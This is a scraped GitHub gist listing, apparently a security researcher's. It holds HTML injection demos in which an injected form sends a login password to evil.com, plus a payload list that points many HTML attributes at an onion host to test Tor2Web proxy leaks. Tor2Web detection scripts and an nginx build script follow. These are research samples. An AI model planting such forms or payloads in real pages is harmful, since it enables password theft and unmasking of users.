Click on the domain for more information via Goolgle Public DNS Tool
<Alexa Rank> - <Domain>
- 1 - google.com
- 92 - googleusercontent.com
- 3206 - symantec.com
intchloe
intchloe
/ Top_100k_Alexa_RR-TYPE-257.md
Last active
July 29, 2016 22:00
intchloe
/ evil_stopped_with_closed_form_tag.html
Last active
July 19, 2016 15:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2) --> | |
| <form action="https://evil.com" method="post" name="fblogin" id="login"> | |
| </form><form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
intchloe
/ evil_stopped.html
Last active
July 19, 2016 14:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2-5) --> | |
| <form action="https://evil.com" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| <textarea> | |
| </textarea>form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
intchloe
/ evil_extract_via_value.html
Last active
July 19, 2016 15:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2) --> | |
| <form method="post" name="fblogin" id="login" action="https://evil.com | |
| <form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
intchloe
/ evil_fail.html
Last active
July 19, 2016 15:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2-5) --> | |
| <form action="https://evil.com" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| <textarea> | |
| </textarea><form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- The hacker injected this (line 2-5) --> | |
| <form action="https://evil.com" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| <textarea> | |
| <form action="/login" method="post" name="fblogin" id="login"> | |
| <input type="password" name="pasword" /> | |
| <input type="submit" name="login" name="fblogin"> | |
| </form> |
intchloe
/ detect_tor2web.php
Created
May 20, 2016 18:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $a = $_SERVER; | |
| echo '<script type="text/javascript" src="/c.js"></script> | |
| '; | |
| echo "------------- Alarming detections -------------</br>"; | |
| if (array_key_exists("HTTP_X_TOR2WEB",$a)) { | |
| echo "The 'HTTP_X_TOR2WEB' key exist, so you are using Tor2Web!</br>"; |
intchloe
/ onion.cab bypasses
Created
May 20, 2016 08:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html SYSTEM "https://swehackmzys2gpmb.onion/doctype"> | |
| <html xmlns="http://www.w3.org/1999/xhtml" manifest="https://swehackmzys2gpmb.onion/html-manifest"> | |
| <?IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation" ?> | |
| <IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation-2" /> | |
| <meta http-equiv="Content-Security-Policy" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri"> | |
| <meta http-equiv="Content-Security-Policy-Report-Only" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri-2"> | |
| <meta name="copyright" content="<img src='https://swehackmzys2gpmb.onion/meta-name-copyright-reading-view'>"> | |
| <meta name="displaydate" content="<img src='https://swehackmzys2gpmb.onion/meta-name-displaydate-reading-view'>"> | |
| <meta property="og:site_name" content="<img src='https://swehackmzys2gpmb.onion/meta-property-reading-view'>"> | |
| <a ping="http://swehackmzys2gpmb.onion/a-pin |
intchloe
/ detect_tor2web.js
Last active
May 20, 2016 08:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function (using_our_domain) { | |
| var domains = ["c3dlaGFjay5vcmc=", "d3d3LnN3ZWhhY2sub3Jn", "c3dlaGFja216eXMyZ3BtYi5vbmlvbg=="]; | |
| var current = document.domain; | |
| if (current != atob(domains[0]) && current != atob(domains[1]) && current != atob(domains[2])) { | |
| document.getElementById('site-nav').innerHTML += '<br><b><center><font color="red">YOU ARE NOT USING ONE OF OUR DOMAINS!</b></font> CLICK <a href=https://'+atob(domains[0])+'>HERE</a> TO USE THE RIGHT ONE.'; | |
| } | |
| } |
intchloe
/ LibreSSL + nginx
Created
May 8, 2016 13:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| mkdir -p /root/nginx | |
| cd /root/nginx | |
| apt-get -y install curl wget build-essential libgd-dev libgeoip-dev checkinstall git | |
| export NGINX_VERSION=1.9.9 | |
| export VERSION_PCRE=pcre-8.38 | |
| export VERSION_LIBRESSL=libressl-2.3.4 |
NewerOlder